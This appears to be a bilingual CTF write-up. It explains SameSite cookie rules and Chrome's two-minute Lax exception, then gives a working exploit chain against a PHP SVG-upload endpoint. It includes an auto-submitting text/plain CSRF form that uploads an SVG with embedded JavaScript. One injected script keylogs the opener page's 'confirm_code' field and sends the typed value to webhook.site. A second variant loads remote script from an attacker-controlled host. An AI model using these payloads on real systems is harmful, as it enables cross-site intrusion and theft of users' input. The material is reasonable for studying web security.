无题

SameSite None Will be sent in all cross origin requests it will be treated as normal (old) cookies
SameSite None 将在所有跨域请求中发送，它将被视为普通（旧）cookie
SameSite Lax Will be sent only in GET request in top window navigations such as _<a>_ tag,window.open()…
SameSite Lax 将仅在顶部窗口导航（如 <a> tag， window.open（））的 GET 请求中发送。

SameSite Strict Will be sent only when the user types the website in the URL bar and presses enter
SameSite Strict 仅当用户在 URL 栏中键入网站并按回车键时才会发送

没有 SameSite 属性的 Cookie 将被视为宽松，这意味着 Cookie 将仅在顶部窗口导航中发送，并且仅发送 GET 请求

Chrome will make an exception for cookies set without a SameSite attribute less than 2 minutes ago. Such cookies will also be sent with non-idempotent (e.g. POST) top-level cross-site requests despite normal SameSite=Lax cookies requiring top-level cross-site requests to have a safe (e.g. GET) HTTP method.
对于不到 2 分钟前设置的没有 SameSite 属性的 Cookie，Chrome 会例外。尽管正常的 SameSite=Lax Cookie 要求顶级跨站点请求具有安全（例如 GET）HTTP 方法，但此类 cookie 也将与非幂等（例如 POST）顶级跨站点请求一起发送。

如果在 2 分钟内设置或更改了 cookie，浏览器将在 POST 请求中发送 cookie，它将被视为无（仅顶部窗口导航），但在 2 分钟后，它将变为正常，为 Lax

svg里可以藏js

<!DOCTYPE svg PUBLIC '-//W3C//DTD SVG 1.1//EN''http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd'>
<svg version='1.1' xmlns='http://www.w3.org/2000/svg'>
      <circle cx='250' cy='250' r='50' fill='red' />
      <script type='text/javascript'><![CDATA[alert(1)]]></script>
</svg>

else if (isValidSvg($content)) {
       $new_name = uniqid() . ".$ext";
       file_put_contents($new_name, $content);
       
if ( 
$_SERVER['HTTP_REFERER'] !== 'http://' . $_SERVER['HTTP_HOST'] . '/admin.php') 
{
       header("Location: /api/$new_name");
       die();
} else die("/api/$new_name");

有重定向
用plain生成纯文本内容

<form method="post" enctype="text/plain" action="http://app:80/api/file.php">
   <textarea name='{"filename":"'>.svg","base64_content": "PCFET"}</textarea>
   <input type="submit">
   </form>

创建一个html文件

import base64
svg_data = base64.b64encode(r"""<!DOCTYPE svg PUBLIC '-//W3C//DTD SVG 1.1//EN'
         'http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd'>
       <svg version='1.1' xmlns='http://www.w3.org/2000/svg'>
         <circle cx='250' cy='250' r='50' fill='red' />
         <script type='text/javascript'><![CDATA[
           alert(1);
           ]]></script>
       </svg>""".encode()).decode()
data = r'''<form method="post" enctype="text/plain" action="http://172.24.0.4/api/file.php">
   <textarea name='{"filename":"'>.svg","base64_content": "'''+svg_data+r'''"}</textarea>
   <input type="submit">
   </form>
   <script>document.forms[0].submit()</script>
   '''
print(data)

把js脚本替换成

var isOpened = false;
fetch('https://webhook.site/XXXX?x=1')
function fun(){
   if(window.opener.document.getElementById('confirm_code') && !isOpened){
       fetch('https://webhook.site/XXXX?x=2')
       console.log(window.opener.location.href );
       isOpened = true;
       function inputCallback(event) {
           console.log("User typed:", event.target.value);
           if (event.target.value.endsWith('}'))
           fetch('https://webhook.site/XXXX?s=' +  escape(event.target.value))
       }
       console.log( window.opener.document.getElementById('confirm_code'));
           window.opener.document.getElementById('confirm_code').addEventListener('input', inputCallback);
}
}
setInterval(fun, 1);

拿到flag

或者

import base64
svg_data = base64.b64encode(r"""<!DOCTYPE svg PUBLIC '-//W3C//DTD SVG 1.1//EN'
         'http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd'>
       <svg version='1.1' xmlns='http://www.w3.org/2000/svg'>
         <circle cx='250' cy='250' r='50' fill='red' />
         <script type='text/javascript'><![CDATA[
           w = window.open();
           w.document.write('<script src="http://X.X.X.X:8000/parent.js"></script>')
           w.document.close()
           ]]></script>
       </svg>""".encode()).decode()
data = r'''<form method="post" enctype="text/plain" action="http://app:80/api/file.php">
   <textarea name='{"filename":"'>.svg","base64_content": "'''+svg_data+r'''"}</textarea>
   <input type="submit">
   </form>
   <script>document.forms[0].submit()</script>
   '''
print(data)